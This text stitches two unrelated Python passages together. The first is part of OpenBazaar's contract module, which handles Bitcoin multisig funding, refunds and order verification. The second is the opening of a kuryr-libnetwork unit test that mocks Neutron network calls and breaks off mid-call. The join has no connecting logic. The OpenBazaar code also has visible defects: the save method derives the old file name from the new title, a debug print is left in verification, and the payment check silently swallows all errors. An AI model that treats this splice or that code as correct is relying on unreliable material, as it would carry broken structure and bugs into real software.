file_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", order_id + ".json")
if os.path.exists(file_path):
os.remove(file_path)
return order_id
def await_funding(self, notification_listener, libbitcoin_client, proofSig, is_purchase=True):
"""
Saves the contract to the file system and db as an unfunded contract.
Listens on the libbitcoin server for the multisig address to be funded.
"""
self.notification_listener = notification_listener
self.blockchain = libbitcoin_client
self.is_purchase = is_purchase
order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
payment_address = self.contract["buyer_order"]["order"]["payment"]["address"]
vendor_item = self.contract["vendor_offer"]["listing"]["item"]
if "image_hashes" in vendor_item:
thumbnail_hash = vendor_item["image_hashes"][0]
else:
thumbnail_hash = ""
if "blockchain_id" in self.contract["vendor_offer"]["listing"]["id"] \
and self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"] != "":
vendor = self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"]
else:
vendor = self.contract["vendor_offer"]["listing"]["id"]["guid"]
if "blockchain_id" in self.contract["buyer_order"]["order"]["id"] \
and self.contract["buyer_order"]["order"]["id"]["blockchain_id"] != "":
buyer = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
else:
buyer = self.contract["buyer_order"]["order"]["id"]["guid"]
if is_purchase:
file_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")
self.db.purchases.new_purchase(order_id,
self.contract["vendor_offer"]["listing"]["item"]["title"],
self.contract["vendor_offer"]["listing"]["item"]["description"],
time.time(),
self.contract["buyer_order"]["order"]["payment"]["amount"],
payment_address,
0,
thumbnail_hash,
vendor,
proofSig,
self.contract["vendor_offer"]["listing"]["metadata"]["category"])
else:
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")
title = self.contract["vendor_offer"]["listing"]["item"]["title"]
description = self.contract["vendor_offer"]["listing"]["item"]["description"]
self.db.sales.new_sale(order_id,
title,
description,
time.time(),
self.contract["buyer_order"]["order"]["payment"]["amount"],
payment_address,
0,
thumbnail_hash,
buyer,
self.contract["vendor_offer"]["listing"]["metadata"]["category"])
try:
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] Order Received", "Order #%s<br>"
"Buyer: %s<br>"
"BTC Address: %s<br>"
"Title: %s<br>"
"Description: %s<br>"
% (order_id, buyer, payment_address, title, description))
except Exception as e:
self.log.info("Error with SMTP notification: %s" % e.message)
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
self.blockchain.subscribe_address(str(payment_address), notification_cb=self.on_tx_received)
def on_tx_received(self, address_version, address_hash, height, block_hash, tx):
"""
Fire when the libbitcoin server tells us we received a payment to this funding address.
While unlikely, a user may send multiple transactions to the funding address to reach the
funding level. We need to keep a running balance and increment it when a new transaction
is received. If the contract is fully funded, we push a notification to the websockets.
"""
try:
# decode the transaction
self.log.info("Bitcoin transaction detected")
transaction = BitcoinTransaction.from_serialized(tx, self.testnet)
# get the amount (in satoshi) the user is expected to pay
amount_to_pay = int(float(self.contract["buyer_order"]["order"]["payment"]["amount"]) * 100000000)
if tx not in self.received_txs: # make sure we aren't parsing the same tx twice.
outpoints = transaction.check_for_funding(
self.contract["buyer_order"]["order"]["payment"]["address"])
if outpoints is not None:
for outpoint in outpoints:
self.amount_funded += outpoint["value"]
self.received_txs.append(tx)
self.outpoints.append(outpoint)
if self.amount_funded >= amount_to_pay: # if fully funded
self.payment_received()
else:
order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
notification_json = {
"notification": {
"type": "partial payment",
"amount_funded": round(self.amount_funded / float(100000000), 8),
"order_id": order_id
}
}
self.notification_listener.push_ws(notification_json)
except Exception as e:
self.log.critical("Error processing bitcoin transaction: %s" % e.message)
def payment_received(self):
self.blockchain.unsubscribe_address(
self.contract["buyer_order"]["order"]["payment"]["address"], self.on_tx_received)
order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
title = self.contract["vendor_offer"]["listing"]["item"]["title"]
if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
else:
image_hash = ""
if self.is_purchase:
unfunded_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")
in_progress_path = os.path.join(DATA_FOLDER, "purchases", "in progress", order_id + ".json")
if "blockchain_id" in self.contract["vendor_offer"]["listing"]["id"]:
handle = self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"]
else:
handle = ""
vendor_guid = self.contract["vendor_offer"]["listing"]["id"]["guid"]
self.notification_listener.notify(unhexlify(vendor_guid), handle, "payment received",
order_id, title, image_hash)
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] Purchase Payment Received", "Your payment was received.<br><br>"
"Order: %s<br>"
"Vendor: %s<br>"
"Title: %s"
% (order_id, vendor_guid, title))
# update the db
if self.db.purchases.get_status(order_id) == 0:
self.db.purchases.update_status(order_id, 1)
self.db.purchases.update_outpoint(order_id, json.dumps(self.outpoints))
self.log.info("Payment for order id %s successfully broadcast to network." % order_id)
else:
unfunded_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")
in_progress_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", order_id + ".json")
buyer_guid = self.contract["buyer_order"]["order"]["id"]["guid"]
if "blockchain_id" in self.contract["buyer_order"]["order"]["id"]:
handle = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
else:
handle = ""
self.notification_listener.notify(unhexlify(buyer_guid), handle, "new order", order_id,
title, image_hash)
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] Payment for Order Received", "Payment was received for Order #%s."
% order_id)
self.db.sales.update_status(order_id, 1)
self.db.sales.status_changed(order_id, 1)
self.db.sales.update_outpoint(order_id, json.dumps(self.outpoints))
self.log.info("Received new order %s" % order_id)
os.rename(unfunded_path, in_progress_path)
def get_contract_id(self):
return self.contract["vendor_offer"]["listing"]["contract_id"]
def get_order_id(self):
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
if "vendor_order_confirmation" in contract_dict:
del contract_dict["vendor_order_confirmation"]
if "buyer_receipt" in contract_dict:
del contract_dict["buyer_receipt"]
if "dispute" in contract_dict:
del contract_dict["dispute"]
if "dispute_resolution" in contract_dict:
del contract_dict["dispute_resolution"]
return digest(json.dumps(contract_dict, indent=4)).encode("hex")
def check_expired(self):
expiry = self.contract["vendor_offer"]["listing"]["metadata"]["expiry"]
if expiry == "never":
return False
elif datetime.strptime(expiry[:len(expiry)-4], '%Y-%m-%dT%H:%M') < datetime.utcnow():
return True
else:
return False
def delete(self, delete_images=False):
"""
Deletes the contract json from the OpenBazaar directory as well as the listing
metadata from the db and all the related images in the file system.
"""
# get the file path
file_path = self.db.filemap.get_file(self.contract["vendor_offer"]["listing"]["contract_id"])
# maybe delete the images from disk
if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"] and delete_images:
for image_hash in self.contract["vendor_offer"]["listing"]["item"]["image_hashes"]:
# delete from disk
image_path = self.db.filemap.get_file(image_hash)
if os.path.exists(image_path):
os.remove(image_path)
# remove pointer to the image from the filemap
self.db.filemap.delete(image_hash)
# delete the contract from disk
if os.path.exists(file_path):
os.remove(file_path)
# delete the listing metadata from the db
contract_hash = unhexlify(self.contract["vendor_offer"]["listing"]["contract_id"])
self.db.listings.delete_listing(contract_hash)
# remove the pointer to the contract from the filemap
self.db.filemap.delete(contract_hash.encode("hex"))
def save(self):
"""
Saves the json contract into the OpenBazaar/store/listings/contracts/ directory.
It uses the title as the file name so it's easy on human eyes. A mapping of the
hash of the contract and file path is stored in the database so we can retrieve
the contract with only its hash.
Additionally, the contract metadata (sent in response to the GET_LISTINGS query)
is saved in the db for fast access.
"""
# get the contract title to use as the file name and format it
file_name = str(self.contract["vendor_offer"]["listing"]["item"]["title"][:100])
file_name = re.sub(r"[^\w\s]", '', file_name)
file_name = re.sub(r"\s+", '_', file_name)
file_name += str(self.contract["vendor_offer"]["listing"]["contract_id"])[:8]
# save the json contract to the file system
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "listings", file_name + ".json")
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
if self.previous_title and self.previous_title != self.contract["vendor_offer"]["listing"]["item"]["title"]:
if isinstance(self.previous_title, unicode):
self.previous_title = self.previous_title.encode('utf8')
old_name = str(self.previous_title[:100])
old_name = re.sub(r"[^\w\s]", '', file_name)
old_name = re.sub(r"\s+", '_', file_name)
old_name += str(self.contract["vendor_offer"]["listing"]["contract_id"])[:8]
old_path = os.path.join(DATA_FOLDER, "store", "contracts", "listings", old_name + ".json")
if os.path.exists(old_path):
os.remove(old_path)
# Create a `ListingMetadata` protobuf object using data from the full contract
listings = Listings()
data = listings.ListingMetadata()
data.contract_hash = unhexlify(self.contract["vendor_offer"]["listing"]["contract_id"])
vendor_item = self.contract["vendor_offer"]["listing"]["item"]
data.title = vendor_item["title"]
if "image_hashes" in vendor_item:
data.thumbnail_hash = unhexlify(vendor_item["image_hashes"][0])
if "category" in vendor_item:
data.category = vendor_item["category"]
if "bitcoin" not in vendor_item["price_per_unit"]:
data.price = float(vendor_item["price_per_unit"]["fiat"]["price"])
data.currency_code = vendor_item["price_per_unit"]["fiat"][
"currency_code"]
else:
data.price = round(float(vendor_item["price_per_unit"]["bitcoin"]), 8)
data.currency_code = "BTC"
data.nsfw = vendor_item["nsfw"]
if "shipping" not in self.contract["vendor_offer"]["listing"]:
data.origin = CountryCode.Value("NA")
else:
data.origin = CountryCode.Value(
self.contract["vendor_offer"]["listing"]["shipping"]["shipping_origin"].upper())
for region in self.contract["vendor_offer"]["listing"]["shipping"]["shipping_regions"]:
data.ships_to.append(CountryCode.Value(region.upper()))
if self.contract["vendor_offer"]["listing"]["metadata"]["category"].lower() == "physical good":
data.contract_type = listings.PHYSICAL_GOOD
elif self.contract["vendor_offer"]["listing"]["metadata"]["category"].lower() == "digital good":
data.contract_type = listings.DIGITAL_GOOD
elif self.contract["vendor_offer"]["listing"]["metadata"]["category"].lower() == "service":
data.contract_type = listings.SERVICE
data.last_modified = int(time.time())
# save the mapping of the contract file path and contract hash in the database
self.db.filemap.insert(data.contract_hash.encode("hex"), file_path[len(DATA_FOLDER):])
# save the `ListingMetadata` protobuf to the database as well
self.db.listings.add_listing(data)
def process_refund(self, refund_json, blockchain, notification_listener):
if "refund" in self.contract:
raise Exception("Refund already processed for this order")
self.contract["refund"] = refund_json["refund"]
order_id = refund_json["refund"]["order_id"]
if "txid" not in refund_json["refund"]:
outpoints = json.loads(self.db.purchases.get_outpoint(order_id))
refund_address = self.contract["buyer_order"]["order"]["refund_address"]
redeem_script = self.contract["buyer_order"]["order"]["payment"]["redeem_script"]
in_value = 0
for outpoint in outpoints:
in_value += outpoint["value"]
out_value = in_value - long(self.contract["buyer_order"]["order"]["payment"]["refund_tx_fee"])
tx = BitcoinTransaction.make_unsigned(outpoints, refund_address,
testnet=self.testnet,
out_value=out_value)
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_b = bitcointools.bip32_extract_key(KeyChain(self.db).bitcoin_master_privkey)
buyer_priv = derive_childkey(masterkey_b, chaincode, bitcointools.MAINNET_PRIVATE)
buyer_sigs = tx.create_signature(buyer_priv, redeem_script)
vendor_sigs = refund_json["refund"]["signature(s)"]
signatures = []
for i in range(len(outpoints)):
for vendor_sig in vendor_sigs:
if vendor_sig["index"] == i:
v_signature = vendor_sig["signature"]
for buyer_sig in buyer_sigs:
if buyer_sig["index"] == i:
b_signature = buyer_sig["signature"]
signature_obj = {"index": i, "signatures": [b_signature, v_signature]}
signatures.append(signature_obj)
tx.multisign(signatures, redeem_script)
tx.broadcast(blockchain)
self.db.transactions.add_transaction(tx.to_raw_tx())
self.log.info("broadcasting refund tx %s to network" % tx.get_hash())
self.db.purchases.update_status(order_id, 7)
self.db.purchases.status_changed(order_id, 1)
file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", order_id + ".json")
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", order_id + ".json")
if os.path.exists(file_path):
os.remove(file_path)
title = self.contract["vendor_offer"]["listing"]["item"]["title"]
if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
else:
image_hash = ""
buyer_guid = self.contract["buyer_order"]["order"]["id"]["guid"]
if "blockchain_id" in self.contract["buyer_order"]["order"]["id"]:
handle = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
else:
handle = ""
notification_listener.notify(buyer_guid, handle, "refund", order_id, title, image_hash)
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] Refund Received", "You received a refund.<br><br>"
"Order: %s<br>Title: %s"
% (order_id, title))
def verify(self, sender_key):
"""
Validate that an order sent over by a buyer is filled out correctly.
"""
SelectParams("testnet" if self.testnet else "mainnet")
try:
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["buyer_order"]
contract_hash = digest(json.dumps(contract_dict, indent=4))
ref_hash = unhexlify(self.contract["buyer_order"]["order"]["ref_hash"])
contract_id = self.contract["vendor_offer"]["listing"]["contract_id"]
# verify that the reference hash matches the contract and that the contract actually exists
if contract_hash != ref_hash or not self.db.filemap.get_file(contract_id):
raise Exception("Order for contract that doesn't exist")
# verify the vendor's own signature
verify_key = self.keychain.signing_key.verify_key
verify_key.verify(json.dumps(self.contract["vendor_offer"]["listing"], indent=4),
base64.b64decode(self.contract["vendor_offer"]["signatures"]["guid"]))
# verify timestamp is within a reasonable time from now
timestamp = self.contract["buyer_order"]["order"]["date"]
dt = datetime.strptime(timestamp[:len(timestamp)-4], "%Y-%m-%d %H:%M:%S.%f")
if abs((datetime.utcnow() - dt).total_seconds()) > 600:
raise Exception("Timestamp on order not within 10 minutes of now")
# verify the signatures on the order
verify_obj = json.dumps(self.contract["buyer_order"]["order"], indent=4)
verify_key = nacl.signing.VerifyKey(sender_key)
verify_key.verify(verify_obj, base64.b64decode(self.contract["buyer_order"]["signatures"]["guid"]))
bitcoin_key = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
bitcoin_sig = self.contract["buyer_order"]["signatures"]["bitcoin"]
valid = bitcointools.ecdsa_raw_verify(verify_obj, bitcointools.decode_sig(bitcoin_sig), bitcoin_key)
if not valid:
raise Exception("Invalid Bitcoin signature")
# verify buyer included the correct bitcoin amount for payment
quantity = int(self.contract["buyer_order"]["order"]["quantity"])
price_json = self.contract["vendor_offer"]["listing"]["item"]["price_per_unit"]
if "bitcoin" in price_json:
asking_price = float(price_json["bitcoin"]) * quantity
else:
currency_code = price_json["fiat"]["currency_code"]
fiat_price = price_json["fiat"]["price"]
conversion_rate = BtcPrice.instance().get(currency_code.upper())
asking_price = float("{0:.8f}".format(float(fiat_price) / float(conversion_rate))) * quantity
if "shipping" in self.contract["vendor_offer"]["listing"]:
if not self.contract["vendor_offer"]["listing"]["shipping"]["free"]:
shipping_origin = self.contract["vendor_offer"]["listing"]["shipping"][
"shipping_origin"].upper()
if shipping_origin == self.contract["buyer_order"]["order"]["shipping"]["country"].upper():
if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
shipping_amount = float(self.contract["vendor_offer"]["listing"]["shipping"][
"flat_fee"]["bitcoin"]["domestic"]) * quantity
else:
price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
"price"]["domestic"]
currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
"fiat"]["currency_code"]
conversion_rate = BtcPrice.instance().get(currency.upper(), False)
shipping_amount = float("{0:.8f}".format(float(price) /
float(conversion_rate))) * quantity
else:
if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
shipping_amount = float(self.contract["vendor_offer"]["listing"]["shipping"][
"flat_fee"]["bitcoin"]["international"]) * quantity
else:
price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
"price"]["international"]
currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
"fiat"]["currency_code"]
conversion_rate = BtcPrice.instance().get(currency.upper(), False)
shipping_amount = float("{0:.8f}".format(float(price) /
float(conversion_rate))) * quantity
asking_price += shipping_amount
print round(float(asking_price), 8), float(self.contract["buyer_order"]["order"]["payment"]["amount"])
if round(float(asking_price), 8) > float(self.contract["buyer_order"]["order"]["payment"]["amount"]):
raise Exception("Insuffient Payment")
if "moderator" in self.contract["buyer_order"]["order"]:
# verify a valid moderator was selected
valid_mod = False
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == self.contract["buyer_order"]["order"]["moderator"]:
valid_mod = True
if not valid_mod:
raise Exception("Invalid moderator")
# verify redeem script
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == self.contract["buyer_order"]["order"]["moderator"]:
masterkey_m = mod["pubkeys"]["bitcoin"]["key"]
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
buyer_key = unhexlify(derive_childkey(masterkey_b, chaincode))
vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
moderator_key = unhexlify(derive_childkey(masterkey_m, chaincode))
redeem_script = CScript([OP_2, buyer_key, vendor_key, moderator_key, OP_3, OP_CHECKMULTISIG])
if redeem_script.encode("hex") != self.contract["buyer_order"]["order"]["payment"]["redeem_script"]:
raise Exception("Invalid redeem script")
# verify the multisig payment address
payment_address = str(P2SHBitcoinAddress.from_redeemScript(redeem_script))
if payment_address != self.contract["buyer_order"]["order"]["payment"]["address"]:
raise Exception("Incorrect payment address")
else:
# verify the direct payment address
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
# verify the payment address
payment_address = str(P2PKHBitcoinAddress.from_pubkey(vendor_key))
if payment_address != self.contract["buyer_order"]["order"]["payment"]["address"]:
raise Exception("Incorrect payment address")
# verify all the shipping fields exist
if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
shipping = self.contract["buyer_order"]["order"]["shipping"]
keys = ["ship_to", "address", "postal_code", "city", "state", "country"]
for value in map(shipping.get, keys):
if value is None:
raise Exception("Missing shipping field")
# verify buyer ID
pubkeys = self.contract["buyer_order"]["order"]["id"]["pubkeys"]
keys = ["guid", "bitcoin"]
for value in map(pubkeys.get, keys):
if value is None:
raise Exception("Missing pubkey field")
return True
except Exception, e:
return e.message
def validate_for_moderation(self, proof_sig):
validation_failures = []
tmp_contract = deepcopy(self.contract)
if "buyer_order" in tmp_contract:
del tmp_contract["buyer_order"]
if "vendor_order_confirmation" in tmp_contract:
del tmp_contract["vendor_order_confirmation"]
if "buyer_receipt" in tmp_contract:
del tmp_contract["buyer_receipt"]
del tmp_contract["dispute"]
contract_hash = digest(json.dumps(tmp_contract, indent=4))
ref_hash = unhexlify(self.contract["buyer_order"]["order"]["ref_hash"])
listing = json.dumps(self.contract["vendor_offer"]["listing"], indent=4)
# verify that the reference hash matches the contract
if contract_hash != ref_hash:
validation_failures.append("Reference hash in buyer_order doesn't match the listing hash;")
# validated the signatures on vendor_offer
vendor_guid_signature = self.contract["vendor_offer"]["signatures"]["guid"]
vendor_bitcoin_signature = self.contract["vendor_offer"]["signatures"]["bitcoin"]
vendor_guid_pubkey = unhexlify(self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["guid"])
vendor_bitcoin_pubkey = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
verify_key = nacl.signing.VerifyKey(vendor_guid_pubkey)
try:
verify_key.verify(listing, base64.b64decode(vendor_guid_signature))
except Exception:
validation_failures.append("Guid signature in vendor_offer not valid;")
valid = bitcointools.ecdsa_raw_verify(listing,
bitcointools.decode_sig(vendor_bitcoin_signature),
vendor_bitcoin_pubkey)
if not valid:
validation_failures.append("Bitcoin signature in vendor_offer is not valid;")
# verify the signatures on the order
order = json.dumps(self.contract["buyer_order"]["order"], indent=4)
buyer_guid_signature = self.contract["buyer_order"]["signatures"]["guid"]
buyer_bitcoin_signature = self.contract["buyer_order"]["signatures"]["bitcoin"]
buyer_bitcoin_pubkey = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
buyer_guid_pubkey = unhexlify(self.contract["buyer_order"]["order"]["id"]["pubkeys"]["guid"])
verify_key = nacl.signing.VerifyKey(buyer_guid_pubkey)
try:
verify_key.verify(order, base64.b64decode(buyer_guid_signature))
except Exception:
validation_failures.append("Guid signature in buyer_order not valid;")
valid = bitcointools.ecdsa_raw_verify(order, bitcointools.decode_sig(buyer_bitcoin_signature),
buyer_bitcoin_pubkey)
if not valid:
validation_failures.append("Bitcoin signature in buyer_order not valid;")
# If the buyer filed this claim, check the vendor's signature to show he accepted the order.
if proof_sig is not None:
address = self.contract["buyer_order"]["order"]["payment"]["address"]
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
buyer_key = derive_childkey(masterkey_b, chaincode)
amount = self.contract["buyer_order"]["order"]["payment"]["amount"]
listing_hash = self.contract["vendor_offer"]["listing"]["contract_id"]
verify_key = nacl.signing.VerifyKey(vendor_guid_pubkey)
try:
verify_key.verify(str(address) + str(amount) + str(listing_hash) + str(buyer_key),
base64.b64decode(proof_sig))
except Exception:
validation_failures.append("Vendor's order-acceptance signature not valid;")
# verify redeem script
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == self.contract["buyer_order"]["order"]["moderator"]:
masterkey_m = mod["pubkeys"]["bitcoin"]["key"]
if masterkey_m != bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey):
validation_failures.append("Moderator Bitcoin key doesn't match key in vendor_order;")
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
masterkey_v = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
buyer_key = derive_childkey(masterkey_b, chaincode)
vendor_key = derive_childkey(masterkey_v, chaincode)
moderator_key = derive_childkey(masterkey_m, chaincode)
redeem_script = bitcointools.mk_multisig_script([buyer_key, vendor_key, moderator_key], 2)
if redeem_script != self.contract["buyer_order"]["order"]["payment"]["redeem_script"]:
validation_failures.append("Bitcoin redeem script not valid for the keys in this contract;")
# verify address from redeem script
if self.testnet:
payment_address = bitcointools.p2sh_scriptaddr(redeem_script, 196)
else:
payment_address = bitcointools.p2sh_scriptaddr(redeem_script)
if self.contract["buyer_order"]["order"]["payment"]["address"] != payment_address:
validation_failures.append("Bitcoin address invalid. Cannot be derived from reddem script;")
# validate vendor_order_confirmation
if "vendor_order_confirmation" in self.contract:
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["vendor_order_confirmation"]
if "buyer_receipt" in contract_dict:
del contract_dict["buyer_receipt"]
contract_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
ref_hash = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
if ref_hash != contract_hash:
validation_failures.append("Reference hash in vendor_order_confirmation does not match order ID;")
vendor_signature = self.contract["vendor_order_confirmation"]["signature"]
confirmation = json.dumps(self.contract["vendor_order_confirmation"]["invoice"], indent=4)
verify_key = nacl.signing.VerifyKey(vendor_guid_pubkey)
try:
verify_key.verify(confirmation, base64.b64decode(vendor_signature))
except Exception:
validation_failures.append("Vendor's signature in vendor_order_confirmation not valid;")
# check the moderator fee is correct
own_guid = self.keychain.guid.encode("hex")
for moderator in self.contract["vendor_offer"]["listing"]["moderators"]:
if moderator["guid"] == own_guid:
fee = float(moderator["fee"][:len(moderator["fee"]) -1])
if Profile(self.db).get().moderation_fee < fee:
validation_failures.append("Moderator fee in contract less than current moderation fee;")
return validation_failures
def __repr__(self):
return json.dumps(self.contract, indent=4)
def check_unfunded_for_payment(db, libbitcoin_client, notification_listener, testnet=False):
"""
Run through the unfunded contracts in our database and query the
libbitcoin server to see if they received a payment.
"""
current_time = time.time()
purchases = db.purchases.get_unfunded()
for purchase in purchases:
if current_time - purchase[1] <= 86400:
check_order_for_payment(purchase[0], db, libbitcoin_client, notification_listener, testnet)
sales = db.sales.get_unfunded()
for sale in sales:
if current_time - sale[1] <= 86400:
check_order_for_payment(sale[0], db, libbitcoin_client, notification_listener, testnet)
def check_order_for_payment(order_id, db, libbitcoin_client, notification_listener, testnet=False):
try:
if os.path.exists(os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")):
file_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")
is_purchase = True
elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")):
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")
is_purchase = False
with open(file_path, 'r') as filename:
order = json.load(filename, object_pairs_hook=OrderedDict)
c = Contract(db, contract=order, testnet=testnet)
c.blockchain = libbitcoin_client
c.notification_listener = notification_listener
c.is_purchase = is_purchase
addr = c.contract["buyer_order"]["order"]["payment"]["address"]
SelectParams("testnet" if testnet else "mainnet")
script_pubkey = CBitcoinAddress(addr).to_scriptPubKey().encode("hex")
def history_fetched(ec, history):
if not ec:
# pylint: disable=W0612
# pylint: disable=W0640
amount_funded = 0
outpoints = []
for objid, txhash, index, height, value in history:
amount_funded += value
o = {
"txid": txhash.encode("hex"),
"vout": index,
"value": value,
"scriptPubKey": script_pubkey
}
outpoints.append(o)
# get the amount (in satoshi) the user is expected to pay
amount_to_pay = int(float(c.contract["buyer_order"]["order"]["payment"]["amount"]) * 100000000)
if amount_funded >= amount_to_pay:
c.outpoints = outpoints
c.payment_received()
libbitcoin_client.fetch_history2(addr, history_fetched)
except Exception:
pass
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import uuid
import ddt
from oslo_serialization import jsonutils
from kuryr.lib import constants as lib_const
from kuryr.lib import utils as lib_utils
from kuryr_libnetwork import app
from kuryr_libnetwork import config
from kuryr_libnetwork import constants
from kuryr_libnetwork.tests.unit import base
from kuryr_libnetwork import utils
@ddt.ddt
class TestKuryr(base.TestKuryrBase):
"""Basic unitests for libnetwork remote driver URI endpoints.
This test class covers the following HTTP methods and URIs as described in
the remote driver specification as below:
https://github.com/docker/libnetwork/blob/3c8e06bc0580a2a1b2440fe0792fbfcd43a9feca/docs/remote.md # noqa
- POST /Plugin.Activate
- POST /NetworkDriver.GetCapabilities
- POST /NetworkDriver.CreateNetwork
- POST /NetworkDriver.DeleteNetwork
- POST /NetworkDriver.CreateEndpoint
- POST /NetworkDriver.EndpointOperInfo
- POST /NetworkDriver.DeleteEndpoint
- POST /NetworkDriver.Join
- POST /NetworkDriver.Leave
- POST /NetworkDriver.DiscoverNew
- POST /NetworkDriver.DiscoverDelete
"""
@ddt.data(('/Plugin.Activate', constants.SCHEMA['PLUGIN_ACTIVATE']),
('/NetworkDriver.GetCapabilities',
{'Scope': config.CONF.capability_scope}),
('/NetworkDriver.DiscoverNew', constants.SCHEMA['SUCCESS']),
('/NetworkDriver.DiscoverDelete', constants.SCHEMA['SUCCESS']))
@ddt.unpack
def test_remote_driver_endpoint(self, endpoint, expected):
response = self.app.post(endpoint)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(expected, decoded_json)
def test_network_driver_create_network(self):
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "create_network")
fake_request = {
"network": {
"name": utils.make_net_name(docker_network_id),
"admin_state_up": True
}
}
# The following fake response is retrieved from the Neutron doc:
# http://developer.openstack.org/api-ref-networking-v2.html#createNetwork # noqa
fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
fake_response = {
"network": {
"status": "ACTIVE",
"subnets": [],
"name": utils.make_net_name(docker_network_id),
"admin_state_up": True,
"tenant_id": "9bacb3c5d39d41a79512987f338cf177",
"router:external": False,
"segments": [],
"shared": False,
"id": fake_neutron_net_id
}
}
app.neutron.create_network(fake_request).AndReturn(fake_response)
self.mox.StubOutWithMock(app.neutron, "add_tag")
tags = utils.create_net_tags(docker_network_id)
for tag in tags:
app.neutron.add_tag('networks', fake_neutron_net_id, tag)
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_existing_subnets_response = {
"subnets": []
}
fake_cidr_v4 = '192.168.42.0/24'
app.neutron.list_subnets(
network_id=fake_neutron_net_id,
cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'create_subnet')
fake_subnet_request = {
"subnets": [{
'name': fake_cidr_v4,
'network_id': fake_neutron_net_id,
'ip_version': 4,
'cidr': fake_cidr_v4,
'enable_dhcp': app.enable_dhcp,
'gateway_ip': '192.168.42.1',
}]
}
subnet_v4_id = str(uuid.uuid4())
fake_v4_subnet = self._get_fake_v4_subnet(
fake_neutron_net_id, subnet_v4_id,
